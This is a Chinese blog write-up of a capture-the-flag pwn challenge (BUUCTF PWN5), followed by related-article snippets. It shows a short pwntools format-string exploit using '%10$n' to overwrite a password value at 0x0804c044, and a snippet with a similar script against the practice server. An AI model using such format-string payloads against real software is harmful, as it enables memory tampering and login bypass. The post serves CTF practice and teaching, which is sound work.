PWN——[第五空间2019 决赛]PWN5

最新推荐文章于 2024-09-27 19:50:51 发布

有头发的琦玉

最新推荐文章于 2024-09-27 19:50:51 发布

阅读量505

点赞数 1

分类专栏： pwn 文章标签：青少年编程

--simon

本文链接：https://blog.csdn.net/qq_38177830/article/details/127857270

版权

pwn 专栏收录该内容

7 篇文章 1 订阅

订阅专栏

前言

网传题解是通过printf的%08x，依次dump出栈中内容，再与传入内容进行比较，以此确定传入内容在栈中的位置。

实际上，IDA是个十分强大的工具，可以通过IDA静态分析出位置

实战

在这里插入图片描述

buf长100字节，位于esp+20

双击buf进入栈视图

在这里插入图片描述

发现写入的数据处于栈的第10位

再去查看要写入的数据

双击进入bss段，发现要写入的数据是DWORD，也就是4字节

四字节正好使用%n (hn是写入两字节，hhn是写入一字节，lln是写入八字节)

在这里插入图片描述

再根据%$n特性，即可构造出payload

在这里插入图片描述

bss=0x0804c044
payload=p32(bss)+b'%10$n'
p.sendline(payload)
p.sendline(b'4') #因为p32是四个字符

注意

%5$n=%x%x%x%x%n

后续

还在别人的博客发现了新的方法，等下次有时间更新

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

有头发的琦玉

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[第五空间2019 决赛]PWN5

qq_45913417的博客

11-18

1850

buuctf——[第五空间2019 决赛]PWN5 1

qq_41560595的博客

03-17

4618

查看文件权限设置了canary，无法栈溢出。 F5查看源程序源程序大意是把随机数放入到bss段的0x804c044处，用户输入用户名和密码，如果密码和随机数相等，则拿到权限。解题思路看到了printf，又加了canary权限，可以想到考查格式化字符串漏洞。可以更改0x804c044处的值，所以要精心构造一个合适的格式化字符串。构造的方法很多。在用户输入用户名处，先输入一个AAAA，试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造： bss=0x804c044 payload=b

参与评论您还未登录，请先登录后发表或查看评论

buuctf pwn [第五空间2019 决赛]PWN51

最新发布

m0_74125780的博客

09-27

356

然后将其放入ida32，查看main函数，幸运的发现有system。然后接下来就是理解这段反编译代码在讲什么，它的意思是它会随机生成一个4字节大小的数据，然后我们输入的passwd要与其相等。但是我们并不知道它随机生成的是什么，所以我们可以进行替换，将它随机生成的数替换成我们要输入的数。32位测输入点偏移，找到0x62626262(bbbb)，数一下刚好是第10位。首先我们可以知道的是，随机生成的数据的开始地址0x804c044。首先用checksec检查一下，发现是32位的，还有栈保护。

【pwn】[第五空间2019 决赛]PWN5

ethan18的博客

07-13

290

函数的逻辑（就是上面那个伪代码），可以看出，主要是需要让我们的passwd输入值和从文件中输入的值保持相同，但是很明显我们根本就不知道这个。可以数出，0x41414141是格式化字符串的第10个参数，所以我们构造的时候就需要从。这是Buuctf的一道题，是我实战遇到的第一道格式字符串漏洞，在此记录。对于格式化字符串漏洞，我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址，表明是有格式字符串漏洞的。，我们一个字节一个字节的存入，所以不能是直接用。，将输出的字符串的数量覆盖进所指向的位置。

buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏

2301_81505831的博客

03-15

471

首先，我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量：可以数出0x41414141是格式化字符串的第10个参数，之后只要修改dword_804c044的值，让输入和dword_804c044的值一样就可以了。打开靶机，下载文件，检查文件类型，可以看到是32位程序，开启了Canary保护，不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后，附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。

Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp

m0sway的博客

03-04

435

Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp

CTF pwn题之格式化字符串漏洞详解

热门推荐

lifanxin的博客

03-22

1万+

FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结概念在遇到pwn题中格式化字符串漏洞时，我们一般会分两大步实现漏洞利用：首先构造一个payload来寻找输入字符串到栈顶指针的偏移，然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。求偏移和任意地址写求偏移在格式化字符串漏洞利用中，我们一般都是这样手动构造payload进行偏移求解的，如下图所示，开头输入方便定位的字符串aaaa，然后

【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3

arttnba3的博客

11-20

1375

GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0

[CTF][第五空间2019 决赛]PWN5 1

凉水的博客

12-09

1214

解题思路反编译后的源码： srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc

BUUCTF - [第五空间2019 决赛]PWN5

Sakura给爷pwn全场

02-03

269

from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw

buuctf pwn 第五空间决赛pwn5

09-28

buuctf pwn 第五空间决赛pwn5是一个CTF pwn题，它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞，利用这个漏洞可以读取或修改程序的内存中的数据，从而导致程序行为异常或者攻击者获取敏感信息。在...